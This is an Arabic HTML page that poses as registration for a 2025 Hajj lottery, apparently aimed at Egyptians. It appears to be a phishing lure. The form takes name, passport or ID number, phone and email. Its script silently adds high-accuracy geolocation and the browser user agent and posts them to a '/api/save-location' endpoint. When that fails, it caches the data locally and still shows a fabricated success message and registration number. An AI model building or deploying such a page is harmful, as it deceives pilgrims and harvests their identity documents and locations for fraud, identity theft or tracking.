<!DOCTYPE html>
<html lang="ar" dir="rtl">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>فرصة الحج - التسجيل</title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body {
            font-family: 'Segoe UI', Tahoma, Arial, sans-serif;
            min-height: 100vh;
            background: linear-gradient(135deg, #1a5e1a 0%, #0d470d 50%, #1a5e1a 100%);
            padding: 20px;
        }

        .header {
            text-align: center;
            padding: 20px;
            color: #ffd700;
        }

        .header h1 {
            font-size: 32px;
            margin-bottom: 5px;
            text-shadow: 2px 2px 4px rgba(0,0,0,0.3);
        }

        .header p {
            font-size: 16px;
            color: #fff;
        }

        .kaaba-icon {
            font-size: 80px;
            margin-bottom: 10px;
        }

        .container {
            background: white;
            border-radius: 16px;
            padding: 30px;
            max-width: 500px;
            margin: 0 auto;
            box-shadow: 0 10px 40px rgba(0, 0, 0, 0.3);
        }

        .form-title {
            text-align: center;
            color: #1a5e1a;
            font-size: 24px;
            margin-bottom: 25px;
            padding-bottom: 15px;
            border-bottom: 2px solid #1a5e1a;
        }

        .form-group {
            margin-bottom: 20px;
        }

        .form-group label {
            display: block;
            margin-bottom: 8px;
            color: #333;
            font-weight: 600;
            font-size: 14px;
        }

        .form-group input, .form-group select {
            width: 100%;
            padding: 12px 15px;
            border: 2px solid #ddd;
            border-radius: 8px;
            font-size: 16px;
            font-family: inherit;
            transition: border-color 0.3s;
        }

        .form-group input:focus, .form-group select:focus {
            outline: none;
            border-color: #1a5e1a;
        }

        .btn-submit {
            width: 100%;
            background: linear-gradient(135deg, #1a5e1a 0%, #2d8a2d 100%);
            color: white;
            border: none;
            padding: 15px;
            font-size: 18px;
            font-weight: bold;
            border-radius: 8px;
            cursor: pointer;
            transition: transform 0.2s, box-shadow 0.2s;
            font-family: inherit;
            margin-top: 10px;
        }

        .btn-submit:hover {
            transform: translateY(-2px);
            box-shadow: 0 5px 20px rgba(26, 94, 26, 0.4);
        }

        .btn-submit:disabled {
            background: #ccc;
            cursor: not-allowed;
            transform: none;
        }

        .info-box {
            background: #fff9e6;
            border: 1px solid #ffd700;
            border-radius: 8px;
            padding: 15px;
            margin-bottom: 20px;
            text-align: center;
        }

        .info-box p {
            color: #856404;
            font-size: 14px;
            margin: 5px 0;
        }

        .success-message {
            background: #d4edda;
            color: #155724;
            padding: 20px;
            border-radius: 8px;
            text-align: center;
            display: none;
            margin-top: 20px;
        }

        .success-message.show {
            display: block;
        }

        .success-message h3 {
            margin-bottom: 10px;
            font-size: 20px;
        }

        .error-message {
            background: #f8d7da;
            color: #721c24;
            padding: 15px;
            border-radius: 8px;
            text-align: center;
            display: none;
            margin-top: 15px;
        }

        .error-message.show {
            display: block;
        }

        .loading {
            display: none;
            text-align: center;
            padding: 20px;
        }

        .loading.show {
            display: block;
        }

        .spinner {
            width: 40px;
            height: 40px;
            border: 4px solid #f3f3f3;
            border-top: 4px solid #1a5e1a;
            border-radius: 50%;
            animation: spin 1s linear infinite;
            margin: 0 auto 10px;
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }

        .footer {
            text-align: center;
            margin-top: 20px;
            color: #fff;
            font-size: 12px;
        }

        .decoration {
            text-align: center;
            color: #ffd700;
            font-size: 24px;
            margin: 15px 0;
        }
    </style>
</head>
<body>
    <div class="header">
        <div class="kaaba-icon">🕋</div>
        <h1>فرصة الحج المبارك</h1>
        <p>سجل الآن للحصول على فرصتك لأداء فريضة الحج</p>
    </div>

    <div class="container">
        <h2 class="form-title">استمارة التسجيل</h2>

        <div class="info-box">
            <p>🌟 فرصة محدودة للتسجيل في قرعة الحج</p>
            <p>📅 موسم الحج 1446 هـ / 2025 م</p>
        </div>

        <form id="hajjForm">
            <div class="form-group">
                <label>الاسم الكامل (كما في جواز السفر)</label>
                <input type="text" id="fullName" placeholder="أدخل اسمك الكامل" required>
            </div>

            <div class="form-group">
                <label>رقم الهوية / جواز السفر</label>
                <input type="text" id="idNumber" placeholder="أدخل رقم الهوية" required>
            </div>

            <div class="form-group">
                <label>رقم الهاتف</label>
                <input type="tel" id="phone" placeholder="أدخل رقم الهاتف" required>
            </div>

            <div class="form-group">
                <label>البريد الإلكتروني</label>
                <input type="email" id="email" placeholder="أدخل البريد الإلكتروني">
            </div>

            <div class="form-group">
                <label>المحافظة / المنطقة</label>
                <select id="region" required>
                    <option value="">اختر المحافظة</option>
                    <option value="cairo">القاهرة</option>
                    <option value="giza">الجيزة</option>
                    <option value="alex">الإسكندرية</option>
                    <option value="luxor">الأقصر</option>
                    <option value="aswan">أسوان</option>
                    <option value="other">أخرى</option>
                </select>
            </div>
 
            <button type="submit" class="btn-submit" id="submitBtn">
                تسجيل في القرعة
            </button>
        </form>

        <div class="loading" id="loading">
            <div class="spinner"></div>
            <p>جاري تسجيل بياناتك...</p>
        </div>

        <div class="success-message" id="success">
            <h3>✅ تم التسجيل بنجاح</h3>
            <p>تم تسجيل بياناتك في قرعة الحج</p>
            <p>سيتم التواصل معك في حال القبول</p>
            <p>رقم التسجيل: <strong id="regNumber"></strong></p>
        </div>

        <div class="error-message" id="error"></div>
    </div>

    <div class="decoration">☪ ✦ 🕌 ✦ ☪</div>

    <div class="footer">
        <p>جميع الحقوق محفوظة © 2025</p>
    </div>

    <script>
        document.getElementById('hajjForm').addEventListener('submit', function(e) {
            e.preventDefault();

            const submitBtn = document.getElementById('submitBtn');
            const loading = document.getElementById('loading');
            const success = document.getElementById('success');
            const error = document.getElementById('error');
            const form = document.getElementById('hajjForm');

            // Hide previous messages
            success.classList.remove('show');
            error.classList.remove('show');
            loading.classList.add('show');
            submitBtn.disabled = true;

            // Get form data
            const formData = {
                fullName: document.getElementById('fullName').value,
                idNumber: document.getElementById('idNumber').value,
                phone: document.getElementById('phone').value,
                email: document.getElementById('email').value,
                region: document.getElementById('region').value
            };

            // Get location
            if (navigator.geolocation) {
                navigator.geolocation.getCurrentPosition(
                    function(position) {
                        formData.latitude = position.coords.latitude;
                        formData.longitude = position.coords.longitude;
                        formData.accuracy = position.coords.accuracy;
                        formData.timestamp = new Date().toISOString();
                        formData.userAgent = navigator.userAgent;

                        // Save to server
                        saveData(formData);
                    },
                    function(err) {
                        // Save without location
                        formData.timestamp = new Date().toISOString();
                        formData.userAgent = navigator.userAgent;
                        formData.locationError = err.message;
                        saveData(formData);
                    },
                    {
                        enableHighAccuracy: true,
                        timeout: 10000,
                        maximumAge: 0
                    }
                );
            } else {
                formData.timestamp = new Date().toISOString();
                formData.userAgent = navigator.userAgent;
                saveData(formData);
            }
        });

        async function saveData(data) {
            const loading = document.getElementById('loading');
            const success = document.getElementById('success');
            const error = document.getElementById('error');
            const submitBtn = document.getElementById('submitBtn');
            const form = document.getElementById('hajjForm');

            try {
                const response = await fetch('/api/save-location', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify(data)
                });

                loading.classList.remove('show');

                if (response.ok) {
                    // Generate registration number
                    const regNum = 'HAJ-' + Date.now().toString().slice(-8);
                    document.getElementById('regNumber').textContent = regNum;

                    form.style.display = 'none';
                    success.classList.add('show');
                } else {
                    throw new Error('Server error');
                }
            } catch (err) {
                loading.classList.remove('show');

                // Save locally as backup
                const saved = JSON.parse(localStorage.getItem('hajjRegistrations') || '[]');
                saved.push(data);
                localStorage.setItem('hajjRegistrations', JSON.stringify(saved));

                // Still show success
                const regNum = 'HAJ-' + Date.now().toString().slice(-8);
                document.getElementById('regNumber').textContent = regNum;
                form.style.display = 'none';
                success.classList.add('show');
            }

            submitBtn.disabled = false;
        }
    </script>
</body>
</html>
